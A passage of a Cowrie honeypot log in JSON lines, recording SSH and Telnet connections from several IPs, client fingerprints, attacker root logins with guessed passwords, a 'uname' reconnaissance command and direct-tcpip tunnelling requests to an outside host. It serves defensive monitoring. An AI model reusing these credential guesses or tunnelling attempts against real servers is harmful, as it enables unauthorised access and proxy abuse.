b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-08T21:11:08.207434Z","src_ip":"64.226.89.172","session":"62c67e9d3307"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:11:08.208874Z","src_ip":"64.226.89.172","session":"62c67e9d3307"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56518,"dst_ip":"1.2.3.4","dst_port":22,"session":"02b8d48219d8","protocol":"ssh","message":"New connection: 212.227.125.160:56518 (1.2.3.4:22) [session: 02b8d48219d8]","sensor":"my-vps","timestamp":"2025-09-08T21:17:27.020820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T21:17:27.061110Z","src_ip":"212.227.125.160","session":"02b8d48219d8"}
{"eventid":"cowrie.client.kex","hassh":"873a5fb5fedc2d4f8638ebde4abc6cfc","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc","sensor":"my-vps","timestamp":"2025-09-08T21:17:27.249901Z","src_ip":"212.227.125.160","session":"02b8d48219d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44796,"dst_ip":"1.2.3.4","dst_port":23,"session":"607f646ee602","protocol":"telnet","message":"New connection: 212.227.125.160:44796 (1.2.3.4:23) [session: 607f646ee602]","sensor":"my-vps","timestamp":"2025-09-08T21:17:27.327765Z"}
{"eventid":"cowrie.session.closed","duration":"15.1","message":"Connection lost after 15.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:17:42.114451Z","src_ip":"212.227.125.160","session":"02b8d48219d8"}
{"eventid":"cowrie.session.closed","duration":15.215561628341675,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:17:42.543248Z","src_ip":"212.227.125.160","session":"607f646ee602"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49868,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5ea96295e07","protocol":"ssh","message":"New connection: 217.72.205.35:49868 (1.2.3.4:22) [session: e5ea96295e07]","sensor":"my-vps","timestamp":"2025-09-08T21:17:45.407223Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:17:45.408334Z","src_ip":"217.72.205.35","session":"e5ea96295e07"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56020,"dst_ip":"1.2.3.4","dst_port":23,"session":"836025ebe74f","protocol":"telnet","message":"New connection: 212.227.125.160:56020 (1.2.3.4:23) [session: 836025ebe74f]","sensor":"my-vps","timestamp":"2025-09-08T21:17:45.841925Z"}
{"eventid":"cowrie.session.closed","duration":3.3393146991729736,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:17:49.181156Z","src_ip":"212.227.125.160","session":"836025ebe74f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43304,"dst_ip":"1.2.3.4","dst_port":23,"session":"25ee98e38223","protocol":"telnet","message":"New connection: 212.227.125.160:43304 (1.2.3.4:23) [session: 25ee98e38223]","sensor":"my-vps","timestamp":"2025-09-08T21:17:52.813945Z"}
{"eventid":"cowrie.session.closed","duration":10.271149396896362,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:18:03.085027Z","src_ip":"212.227.125.160","session":"25ee98e38223"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":61785,"dst_ip":"1.2.3.4","dst_port":22,"session":"72f1087dee59","protocol":"ssh","message":"New connection: 212.227.125.160:61785 (1.2.3.4:22) [session: 72f1087dee59]","sensor":"my-vps","timestamp":"2025-09-08T21:18:36.687187Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:18:36.688181Z","src_ip":"212.227.125.160","session":"72f1087dee59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62031,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a7e64b6575a","protocol":"ssh","message":"New connection: 212.227.125.160:62031 (1.2.3.4:22) [session: 6a7e64b6575a]","sensor":"my-vps","timestamp":"2025-09-08T21:18:36.794154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T21:18:36.795088Z","src_ip":"212.227.125.160","session":"6a7e64b6575a"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T21:18:36.905165Z","src_ip":"212.227.125.160","session":"6a7e64b6575a"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:18:37.236185Z","src_ip":"212.227.125.160","session":"6a7e64b6575a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T21:18:37.347061Z","session":"6a7e64b6575a"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:19:46.794340Z","src_ip":"212.227.125.160","session":"6a7e64b6575a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35716,"dst_ip":"1.2.3.4","dst_port":22,"session":"25f3a90401bc","protocol":"ssh","message":"New connection: 212.227.125.160:35716 (1.2.3.4:22) [session: 25f3a90401bc]","sensor":"my-vps","timestamp":"2025-09-08T21:20:11.942872Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:20:12.153427Z","src_ip":"212.227.125.160","session":"25f3a90401bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35724,"dst_ip":"1.2.3.4","dst_port":22,"session":"7adcaf68d79d","protocol":"ssh","message":"New connection: 212.227.125.160:35724 (1.2.3.4:22) [session: 7adcaf68d79d]","sensor":"my-vps","timestamp":"2025-09-08T21:20:13.381280Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T21:20:17.436499Z","src_ip":"212.227.125.160","session":"7adcaf68d79d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-09-08T21:20:17.437185Z","src_ip":"212.227.125.160","session":"7adcaf68d79d"}
{"eventid":"cowrie.login.success","username":"root","password":"------fuck------","message":"login attempt [root/------fuck------] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:20:29.372917Z","src_ip":"212.227.125.160","session":"7adcaf68d79d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:20:30.362345Z","src_ip":"212.227.125.160","session":"7adcaf68d79d"}
{"eventid":"cowrie.command.input","input":"uname -s -m","message":"CMD: uname -s -m","sensor":"my-vps","timestamp":"2025-09-08T21:20:30.363353Z","src_ip":"212.227.125.160","session":"7adcaf68d79d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","size":13,"shasum":"6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/6fa4c8ac58e7a1d947dc3250c39d1e27958f012e68061d8de0a7b70e3a65b906 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:20:30.572265Z","src_ip":"212.227.125.160","session":"7adcaf68d79d"}
{"eventid":"cowrie.session.closed","duration":"17.2","message":"Connection lost after 17.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:20:30.573658Z","src_ip":"212.227.125.160","session":"7adcaf68d79d"}
{"eventid":"cowrie.session.connect","src_ip":"112.167.116.155","src_port":51782,"dst_ip":"1.2.3.4","dst_port":23,"session":"b9d4f1ae3ba6","protocol":"telnet","message":"New connection: 112.167.116.155:51782 (1.2.3.4:23) [session: b9d4f1ae3ba6]","sensor":"my-vps","timestamp":"2025-09-08T21:22:24.073369Z"}
{"eventid":"cowrie.session.closed","duration":13.012905359268188,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:22:37.086189Z","src_ip":"112.167.116.155","session":"b9d4f1ae3ba6"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56028,"dst_ip":"1.2.3.4","dst_port":22,"session":"e65c255089ac","protocol":"ssh","message":"New connection: 217.72.205.35:56028 (1.2.3.4:22) [session: e65c255089ac]","sensor":"my-vps","timestamp":"2025-09-08T21:24:27.299013Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:24:27.300194Z","src_ip":"217.72.205.35","session":"e65c255089ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59366,"dst_ip":"1.2.3.4","dst_port":22,"session":"968773b8b23e","protocol":"ssh","message":"New connection: 212.227.125.160:59366 (1.2.3.4:22) [session: 968773b8b23e]","sensor":"my-vps","timestamp":"2025-09-08T21:27:18.336678Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T21:27:18.337567Z","src_ip":"212.227.125.160","session":"968773b8b23e"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-08T21:27:18.500409Z","src_ip":"212.227.125.160","session":"968773b8b23e"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:27:26.336765Z","src_ip":"212.227.125.160","session":"968773b8b23e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":2840,"dst_ip":"1.2.3.4","dst_port":23,"session":"1add43c6410e","protocol":"telnet","message":"New connection: 212.227.125.160:2840 (1.2.3.4:23) [session: 1add43c6410e]","sensor":"my-vps","timestamp":"2025-09-08T21:29:14.555816Z"}
{"eventid":"cowrie.session.closed","duration":13.637334823608398,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:29:28.193064Z","src_ip":"212.227.125.160","session":"1add43c6410e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35526,"dst_ip":"1.2.3.4","dst_port":22,"session":"eab1696c96c0","protocol":"ssh","message":"New connection: 212.227.235.229:35526 (1.2.3.4:22) [session: eab1696c96c0]","sensor":"my-vps","timestamp":"2025-09-08T21:29:58.194036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T21:29:58.194757Z","src_ip":"212.227.235.229","session":"eab1696c96c0"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-08T21:29:58.405438Z","src_ip":"212.227.235.229","session":"eab1696c96c0"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:30:06.194943Z","src_ip":"212.227.235.229","session":"eab1696c96c0"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.117","src_port":65105,"dst_ip":"1.2.3.4","dst_port":22,"session":"c42d875fdc0e","protocol":"ssh","message":"New connection: 80.94.95.117:65105 (1.2.3.4:22) [session: c42d875fdc0e]","sensor":"my-vps","timestamp":"2025-09-08T21:30:08.644518Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:30:08.676235Z","src_ip":"80.94.95.117","session":"c42d875fdc0e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53844,"dst_ip":"1.2.3.4","dst_port":22,"session":"915008c404fb","protocol":"ssh","message":"New connection: 217.72.205.35:53844 (1.2.3.4:22) [session: 915008c404fb]","sensor":"my-vps","timestamp":"2025-09-08T21:31:07.837237Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:31:07.838318Z","src_ip":"217.72.205.35","session":"915008c404fb"}
{"eventid":"cowrie.session.connect","src_ip":"117.72.74.154","src_port":54262,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d988ee9d85c","protocol":"ssh","message":"New connection: 117.72.74.154:54262 (1.2.3.4:22) [session: 4d988ee9d85c]","sensor":"my-vps","timestamp":"2025-09-08T21:31:29.289354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T21:31:29.290219Z","src_ip":"117.72.74.154","session":"4d988ee9d85c"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:31:37.290151Z","src_ip":"117.72.74.154","session":"4d988ee9d85c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62236,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7b3e90255c3","protocol":"ssh","message":"New connection: 212.227.235.229:62236 (1.2.3.4:22) [session: d7b3e90255c3]","sensor":"my-vps","timestamp":"2025-09-08T21:33:54.414308Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:33:54.416187Z","src_ip":"212.227.235.229","session":"d7b3e90255c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62524,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2705d85cfe8","protocol":"ssh","message":"New connection: 212.227.235.229:62524 (1.2.3.4:22) [session: a2705d85cfe8]","sensor":"my-vps","timestamp":"2025-09-08T21:33:54.543211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T21:33:54.544081Z","src_ip":"212.227.235.229","session":"a2705d85cfe8"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T21:33:54.672940Z","src_ip":"212.227.235.229","session":"a2705d85cfe8"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:33:55.060775Z","src_ip":"212.227.235.229","session":"a2705d85cfe8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T21:33:55.190620Z","session":"a2705d85cfe8"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:35:04.544704Z","src_ip":"212.227.235.229","session":"a2705d85cfe8"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":33246,"dst_ip":"1.2.3.4","dst_port":23,"session":"c34da7b74ef0","protocol":"telnet","message":"New connection: 79.124.8.120:33246 (1.2.3.4:23) [session: c34da7b74ef0]","sensor":"my-vps","timestamp":"2025-09-08T21:37:51.948693Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:37:51.988291Z","src_ip":"79.124.8.120","session":"c34da7b74ef0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:37:52.053565Z","src_ip":"79.124.8.120","session":"c34da7b74ef0"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53104,"dst_ip":"1.2.3.4","dst_port":22,"session":"b30bad6ec102","protocol":"ssh","message":"New connection: 217.72.205.35:53104 (1.2.3.4:22) [session: b30bad6ec102]","sensor":"my-vps","timestamp":"2025-09-08T21:38:00.044089Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:38:00.045339Z","src_ip":"217.72.205.35","session":"b30bad6ec102"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38654,"dst_ip":"1.2.3.4","dst_port":22,"session":"0aed6f044a60","protocol":"ssh","message":"New connection: 212.227.125.160:38654 (1.2.3.4:22) [session: 0aed6f044a60]","sensor":"my-vps","timestamp":"2025-09-08T21:38:13.098011Z"}
